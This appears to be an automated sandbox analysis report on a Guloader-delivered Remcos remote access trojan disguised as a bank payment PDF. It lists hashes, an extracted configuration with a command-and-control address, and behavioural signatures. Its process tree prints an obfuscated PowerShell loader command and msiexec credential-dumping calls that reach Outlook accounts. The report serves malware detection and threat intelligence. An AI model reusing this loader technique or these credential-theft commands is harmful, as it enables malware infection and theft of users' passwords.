Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
25/02/2025, 14:32
General
-
Target
AkBankPaymentAdvice25.02.25.PDF.exe
-
Size
810KB
-
MD5
aa803cd51f3e60c2b20243bb9daf0ecc
-
SHA1
55a459947d00e90778254731697f7c0483ea8bee
-
SHA256
bd8fd6be04313a5a4eb8fa44ebfab32d3a3f070f704aab64a1942385f96bc5b5
-
SHA512
63f1105ccb841bf68938710bdd2b3db98fa427f0e3e49f1e2f775f13c4d1cdc057f695d8177b5832fb923fe3aeb5f9e9263bed51a470d2d2d714907f765562db
-
SSDEEP
12288:bXlJzDftpn5sJdU0FwCUcOpIKtuMmjjvF+aTfX+Q+szg8wtS1HirSnVHNYRSD6H8:bXLPX6bCCCGMm/Fr+NswStikt+H
Malware Config
Extracted
remcos
RemoteHost
103.195.236.246:9462
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-AISZUC
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 19 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AkBankPaymentAdvice25.02.25.PDF.exe"C:\Users\Admin\AppData\Local\Temp\AkBankPaymentAdvice25.02.25.PDF.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Disbase=gc -Raw 'C:\Users\Admin\AppData\Local\overmitigating\Semimatureness.Syn';$Portended=$Disbase.SubString(2330,3);.$Portended($Disbase)" "$Disbase=gc -Raw 'C:\Users\Admin\AppData\Local\overmitigating\Semimatureness.Syn';$Portended=$Disbase.SubString(2330,3);.$Portended($Disbase)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ihsuqgjbuhbamcya"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\sjyeqycchptnoimetbe"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\dddxrjnwvxlsywiikmraqoz"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD5d25d0f9c48e4779dc27cf85846dcbaef
SHA11b69820d505a91423b71073069afeeea251ce8d3
SHA2568448d803f64e55eae8df5b82207be90ca904ef84f640c5a8df2c0776971d31a8
SHA5126c63acba79711bf907e5f738374a9c1cb08de7b33fda8596da01e37200206423f2d82fc760642aedfd43aac4207af408af004e47d58db092832cb2988dd5cbd2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD501175e02954cdbacf6a27feb49b7dea7
SHA1bc993a6a54eb9f27b4e81fb47cdfb7ac51a4a6cc
SHA256b722cecc751e05566f77c805d3366d2ab0c73ee165dbdc91b460834c781c0c20
SHA5129619160604c4e770419bad6933364680460560b3b3f799cc4df7014112d5033d9949350c9d0677a02d835ee588c521a7baee7ae2591e832fa7304df7652ea65d
-
Filesize
343KB
MD57b231efc2be67bf7b4ffb948b5886ffd
SHA15227dc69a3aea7e9d57c3d5103fbd65f93f9942b
SHA256a05de994345474985b6aed6d8c13fb8b03c95330bf8c1b0c687b0309271a26e7
SHA512d7a6fbf762639f57e72f83c63d12268bab84f53ef2d994d4b9c52bbb8a7a9d1af52c5c9f2c8a31d6688f4cc44817c0e1ba611dcee2f06d1559a854a440d9a433
-
Filesize
71KB
MD58e902a81fa8503a616e19a1918fd9272
SHA1f3f35dc9bfa3fd4c168fcfee1773a41c1d7cc80f
SHA2569f62a9339e6b0d20c1d1505700e2c364848ec6bc1929c6a7a1c9cc8486a2e2ec
SHA5127f6cc83677c6e2f78586470cfab463c6623fb414ac75881d024c089931dee50d5ef5d2aa8308e1e65b12b11ecbf0560d50deebe0e4eb76b618645b3a610bf4da
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
15.2MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
15.2MB
-
Filesize
7.7MB
-
Filesize
200KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
15.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
1.1MB
-
Filesize
7.7MB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
4KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
6.5MB
-
Filesize
5.6MB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
216KB